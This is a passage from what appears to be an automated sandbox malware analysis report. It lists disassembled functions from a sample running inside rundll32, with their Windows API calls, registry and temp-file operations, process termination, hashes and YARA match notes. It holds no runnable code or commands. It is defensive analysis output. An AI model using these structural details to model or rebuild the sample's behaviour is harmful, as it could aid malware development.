                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 059495A8
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 059495D7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                              • String ID:
                              • API String ID: 239510280-0
                              • Opcode ID: beb3e083c9b8ca568ba589b075c726501f0f0b18aa1a2454e5aec28f86f759d0
                              • Instruction ID: 4e876dd6d3c20c18a9bee83b582872690a4b20ce49123d189d91098e950b057a
                              • Opcode Fuzzy Hash: beb3e083c9b8ca568ba589b075c726501f0f0b18aa1a2454e5aec28f86f759d0
                              • Instruction Fuzzy Hash: 7141A231618345FBDB229BA4CC49FAF7FAAEB45750F244024FA09AB180DB759E50DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594D698 Relevance: 10.6, APIs: 7, Instructions: 126memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D6F2
                              • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D710
                              • RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0594D73C
                              • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D753
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594D766
                              • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D775
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,05931785,?,?,?), ref: 0594D7D9
                                • Part of subcall function 0593F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0593F384
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                              • String ID:
                              • API String ID: 1635816815-0
                              • Opcode ID: f5be4fa09bf21bcb088ba21ddb1cd2c612e873e7df1b34fcac656e3210df9a67
                              • Instruction ID: 83a2eedfd348f53355bdf272254a66ca8450742b96a6e66e51bd9e2e710f17d6
                              • Opcode Fuzzy Hash: f5be4fa09bf21bcb088ba21ddb1cd2c612e873e7df1b34fcac656e3210df9a67
                              • Instruction Fuzzy Hash: 39417C75A00318EBDB21AFA4CC89FAEBFA9FF44350F054125F909A7150D770AD50DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594458D Relevance: 10.6, APIs: 7, Instructions: 124registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL ref: 059445B6
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 059445F9
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05944614
                              • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 0594466A
                              • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 059446C6
                              • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 059446D4
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 059446DF
                                • Part of subcall function 059326D3: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 059326E7
                                • Part of subcall function 059326D3: memcpy.NTDLL(00000000,?,?,?), ref: 05932710
                                • Part of subcall function 059326D3: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 05932739
                                • Part of subcall function 059326D3: RegCloseKey.ADVAPI32(?), ref: 05932764
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                              • String ID:
                              • API String ID: 3181710096-0
                              • Opcode ID: 4e537785b6aebe41582c29cb8a7a990f5ee493e86661736aefca074286b790db
                              • Instruction ID: d48299520bbbb5b3b7ae49ed55be05f55dc49fbd1e5699066c5c189b3716d8d6
                              • Opcode Fuzzy Hash: 4e537785b6aebe41582c29cb8a7a990f5ee493e86661736aefca074286b790db
                              • Instruction Fuzzy Hash: B9416772218305ABEF218F65E88AF6A7BADFF40651F144024F90ADA150DB70DD60CFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05951AAC Relevance: 10.6, APIs: 7, Instructions: 124threadstringCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 05951AED
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 05951B1B
                              • GetWindowThreadProcessId.USER32(?,?), ref: 05951B60
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 05951B88
                              • _strupr.NTDLL ref: 05951BB3
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 05951BC0
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 05951BDA
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                              • String ID:
                              • API String ID: 3831658075-0
                              • Opcode ID: bfafabb1eb48cf5ee5f5141460a3b57fe0c23dcedcec4f3347b9112519b45bf2
                              • Instruction ID: 3139fd9dd75d7eed38438aab234722e3fd13594de68ab454f4cf3cb11a1e6aab
                              • Opcode Fuzzy Hash: bfafabb1eb48cf5ee5f5141460a3b57fe0c23dcedcec4f3347b9112519b45bf2
                              • Instruction Fuzzy Hash: 49413971D04218EBDF21DFA4CC4ABEEBBBDBB48711F144056FA06A2150DB7596A0DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059448FD Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                              • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 05944943
                              • StrTrimA.SHLWAPI(?,?), ref: 05944961
                              • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 059449CA
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 059449EB
                              • DeleteFileA.KERNEL32(?,00003219), ref: 05944A0D
                              • HeapFree.KERNEL32(00000000,?), ref: 05944A1C
                              • HeapFree.KERNEL32(00000000,?,00003219), ref: 05944A34
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 1078934163-0
                              • Opcode ID: c00eb672c8f4c8257ec6c98a1220c12652b3eb7e0e62adaac561f23d9c28459d
                              • Instruction ID: cbe9b91e81418a7d82dc57f1f5386393c3ef62adec57d03b4f3a1df275d7ca8e
                              • Opcode Fuzzy Hash: c00eb672c8f4c8257ec6c98a1220c12652b3eb7e0e62adaac561f23d9c28459d
                              • Instruction Fuzzy Hash: B431EE32218306AFEB10EBA4DD05F6ABBECFF49B01F040514FA48D7141DB64ED199BA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593E011 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,05938478,00000000), ref: 0593E02B
                              • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0593E040
                              • memset.NTDLL ref: 0593E04D
                              • HeapFree.KERNEL32(00000000,00000000,?,05938477,?,?,00000000,?,00000000,05949CD0,?,00000000), ref: 0593E06A
                              • memcpy.NTDLL(?,?,05938477,?,05938477,?,?,00000000,?,00000000,05949CD0,?,00000000), ref: 0593E08B
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Allocate$Freememcpymemset
                              • String ID: chun
                              • API String ID: 2362494589-3058818181
                              • Opcode ID: fcfd2a5b10755ff67598a9341ad112aedc430fd160e02891c2834361fc577d2b
                              • Instruction ID: 3839cf6ea72becee73828186dbf145a7b2870dc8d111e9d1c84c77419794905c
                              • Opcode Fuzzy Hash: fcfd2a5b10755ff67598a9341ad112aedc430fd160e02891c2834361fc577d2b
                              • Instruction Fuzzy Hash: 81315971608706EFDB309FA5D846A26BBEDFF48210B018529F94ACB220DB70F915CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05938EAF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                              • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 05938ED3
                                • Part of subcall function 0593A5E7: lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,05938EF7,?,00000000,000000FF), ref: 0593A5F8
                                • Part of subcall function 0593A5E7: lstrlen.KERNEL32(?,?,?,?,05938EF7,?,00000000,000000FF), ref: 0593A5FF
                                • Part of subcall function 0593A5E7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0593A611
                                • Part of subcall function 0593A5E7: _snprintf.NTDLL ref: 0593A637
                                • Part of subcall function 0593A5E7: _snprintf.NTDLL ref: 0593A66B
                                • Part of subcall function 0593A5E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0593A688
                              • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 05938F6D
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 05938F8A
                              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 05938F92
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 05938FA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                              • String ID: s:
                              • API String ID: 2960378068-2363032815
                              • Opcode ID: 899713fce9f73df83195422aff845777442751a2c251b73bf5959376c59e2ff7
                              • Instruction ID: ab99a7e0d61153798453e9511e487c99f45c60ef231537f5939346b686e90820
                              • Opcode Fuzzy Hash: 899713fce9f73df83195422aff845777442751a2c251b73bf5959376c59e2ff7
                              • Instruction Fuzzy Hash: BE314172A14205FFDB10DBE8DD89FDEBFBDAB49211F040555F609E2142EB74A9148BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059313E0 Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 059313F6
                              • lstrcmpiW.KERNEL32(00000000,?), ref: 0593142E
                              • lstrcmpiW.KERNEL32(?,?), ref: 05931443
                              • lstrlenW.KERNEL32(?), ref: 0593144A
                              • CloseHandle.KERNEL32(?), ref: 05931472
                              • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0593149E
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 059314BC
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                              • String ID:
                              • API String ID: 1496873005-0
                              • Opcode ID: aeaa33c03f72f33fbef6519da850a83975dac7c1912ddfc16264cf97dfbeca89
                              • Instruction ID: 876be05189431a496a36f08996857eb9dec2af09e86652313a50272c2a21e019
                              • Opcode Fuzzy Hash: aeaa33c03f72f33fbef6519da850a83975dac7c1912ddfc16264cf97dfbeca89
                              • Instruction Fuzzy Hash: 76218C71A14305EFDB109FB1DC8EEABBBBDFF44204B055124B906E2121EB34E910DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593F7F2 Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(0593F67C,00000000,0595A420,0595A440,?,?,0593F67C,0594E453,0595A420), ref: 0593F802
                              • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0593F818
                              • lstrlen.KERNEL32(0594E453,?,?,0593F67C,0594E453,0595A420), ref: 0593F820
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0593F82C
                              • lstrcpy.KERNEL32(0595A420,0593F67C), ref: 0593F842
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0593F67C,0594E453,0595A420), ref: 0593F896
                              • HeapFree.KERNEL32(00000000,0595A420,?,?,0593F67C,0594E453,0595A420), ref: 0593F8A5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$lstrcpy
                              • String ID:
                              • API String ID: 1531811622-0
                              • Opcode ID: 7883fb96c9e70fceac69f2b9501e1928d2c6d1b22df79949caeadca04c779b3d
                              • Instruction ID: b902381e7cffd20d557b69631d1cb7e67c13c0a47fb31e64f5aeb7dc2831a5cc
                              • Opcode Fuzzy Hash: 7883fb96c9e70fceac69f2b9501e1928d2c6d1b22df79949caeadca04c779b3d
                              • Instruction Fuzzy Hash: 5B21D731518344EFEB124F68DC46F6ABFAAFF4A350F154058F84A97211CB399C55D7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059513B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,05940E77,00000000), ref: 059513DA
                                • Part of subcall function 05943193: lstrcpy.KERNEL32(-000000FC,00000000), ref: 059431CD
                                • Part of subcall function 05943193: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,059513E7,?,?,00000000,?,05940E77,00000000), ref: 059431DF
                                • Part of subcall function 05943193: GetTickCount.KERNEL32 ref: 059431EA
                                • Part of subcall function 05943193: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,059513E7,?,?,00000000,?,05940E77,00000000), ref: 059431F6
                                • Part of subcall function 05943193: lstrcpy.KERNEL32(00000000), ref: 05943210
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpy.KERNEL32(00000000), ref: 05951415
                              • wsprintfA.USER32 ref: 05951428
                              • GetTickCount.KERNEL32 ref: 0595143D
                              • wsprintfA.USER32 ref: 05951452
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                              • String ID: "%S"
                              • API String ID: 1152860224-1359967185
                              • Opcode ID: d9d4d64d6218de9f789440393dab895d2891aae97661444ee10db4f2d9362ff2
                              • Instruction ID: 5c6a4748a17910bd9c7108f6484a172833a7419436955e14d7400f99fb7a7190
                              • Opcode Fuzzy Hash: d9d4d64d6218de9f789440393dab895d2891aae97661444ee10db4f2d9362ff2
                              • Instruction Fuzzy Hash: 1E11ACB2609315BFD711ABA49C4DF6FBB9CEF84660B064414F94997201DB78AC10CBB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593977C Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,0593314A,00000000), ref: 059397BD
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,0593314A,00000000,00000000,00000004,?,00000000,?), ref: 05939830
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 2078930461-0
                              • Opcode ID: 1df39a9b3ed070a39e4a59328cf2d6af726b2a3328a4a47cf7daf5b82ef96a43
                              • Instruction ID: 964852069886f28445f5ed0383122ed8d7e9fb5802361452ba87ea24a489d4e1
                              • Opcode Fuzzy Hash: 1df39a9b3ed070a39e4a59328cf2d6af726b2a3328a4a47cf7daf5b82ef96a43
                              • Instruction Fuzzy Hash: E511EF31258314FBD7212E31AC8EF7FBF6DEB8A761F010521F64995181DBA2486887E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594EA15 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594358E: lstrlen.KERNEL32(00000000,00000000,76CC81D0,773BEEF0,?,?,?,0594EA2E,?,76C85520,773BEEF0,?,00000000,0593E842,00000000,05F3C310), ref: 059435F5
                                • Part of subcall function 0594358E: sprintf.NTDLL ref: 05943616
                              • lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA40
                              • lstrlen.KERNEL32(?,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA48
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • strcpy.NTDLL ref: 0594EA5F
                              • lstrcat.KERNEL32(00000000,?), ref: 0594EA6A
                                • Part of subcall function 0594C32E: lstrlen.KERNEL32(?,?,?,00000000,?,0594EA79,00000000,?,?,00000000,0593E842,00000000,05F3C310), ref: 0594C33F
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA87
                                • Part of subcall function 0593930C: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,0594EA93,00000000,?,00000000,0593E842,00000000,05F3C310), ref: 05939316
                                • Part of subcall function 0593930C: _snprintf.NTDLL ref: 05939374
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                              • String ID: =
                              • API String ID: 2864389247-1428090586
                              • Opcode ID: 4d2dce234c1e222b49835c93328bc3e295095df9350a7bdc09d999a96470a4e1
                              • Instruction ID: 992d6eef006d75a4ccdf349acb57db9dcade96b17228a76dbeb513ade8d1215a
                              • Opcode Fuzzy Hash: 4d2dce234c1e222b49835c93328bc3e295095df9350a7bdc09d999a96470a4e1
                              • Instruction Fuzzy Hash: 73112533A04224BB8F22BBB89C8DC6E3BADBFC95643060015F90597200CF78ED024BE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05939E82 Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON
                              Download Yara Rule
                              APIs
                              • SwitchToThread.KERNEL32(?,?,0594E846), ref: 05939EAD
                              • CloseHandle.KERNEL32(?,?,0594E846), ref: 05939EB9
                              • CloseHandle.KERNEL32(00000000,76CDF720,?,05933576,00000000,?,?,?,0594E846), ref: 05939ECB
                              • memset.NTDLL ref: 05939EE2
                              • memset.NTDLL ref: 05939EF9
                              • memset.NTDLL ref: 05939F10
                              • memset.NTDLL ref: 05939F27
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset$CloseHandle$SwitchThread
                              • String ID:
                              • API String ID: 3699883640-0
                              • Opcode ID: 750afdd50caf63559812c3dea0f1c43c745d9e6632df48685a2ff15bdd0b70e8
                              • Instruction ID: 6fe729c25448fbfc2b70005b6fb27bf66d4049d5d42e43e89e5354c2f033692d
                              • Opcode Fuzzy Hash: 750afdd50caf63559812c3dea0f1c43c745d9e6632df48685a2ff15bdd0b70e8
                              • Instruction Fuzzy Hash: 1A11AB31A59610ABD7117725AC0FE4BBFADEFD57027890225F409A2100CF566DA0C7E9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593CA7A Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0593CAAB
                              • wcstombs.NTDLL ref: 0593CABC
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934975
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,00000020,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934984
                              • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0593CADD
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0593CAEC
                              • CloseHandle.KERNEL32(00000000), ref: 0593CAF3
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0593CB02
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0593CB12
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                              • String ID:
                              • API String ID: 417118235-0
                              • Opcode ID: 70b1a6c64665628442045fcd1aa9df21cff58ccd6e467e987be2a100d67120a4
                              • Instruction ID: eb0b2431ae393f7f1a974c82558e4e5f3efd4ce7305a8fad11e2d82825a8c165
                              • Opcode Fuzzy Hash: 70b1a6c64665628442045fcd1aa9df21cff58ccd6e467e987be2a100d67120a4
                              • Instruction Fuzzy Hash: 0111EF31118715FBE7109F64DC4ABAABFACFF04312F000020F90AA6181CBB1AC64CBE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05943193 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                              • lstrcpy.KERNEL32(-000000FC,00000000), ref: 059431CD
                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,059513E7,?,?,00000000,?,05940E77,00000000), ref: 059431DF
                              • GetTickCount.KERNEL32 ref: 059431EA
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,059513E7,?,?,00000000,?,05940E77,00000000), ref: 059431F6
                              • lstrcpy.KERNEL32(00000000), ref: 05943210
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                              • String ID: \Low
                              • API String ID: 1629304206-4112222293
                              • Opcode ID: 6032eb5a0f20b93d2944f202bf61f39a7d8dfa1a961ba470b24bee2abc99e10b
                              • Instruction ID: 77bca659fb6ea3e4aa5994442b7b375c29743daf9f04e80e8529ca3e8e55bfb0
                              • Opcode Fuzzy Hash: 6032eb5a0f20b93d2944f202bf61f39a7d8dfa1a961ba470b24bee2abc99e10b
                              • Instruction Fuzzy Hash: FC01DE31205B24ABDA216BB59D89F6FBB9CBF46651B060820F506D3181CF28DD40CBF4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05936F51 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 05936F64
                              • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05936F76
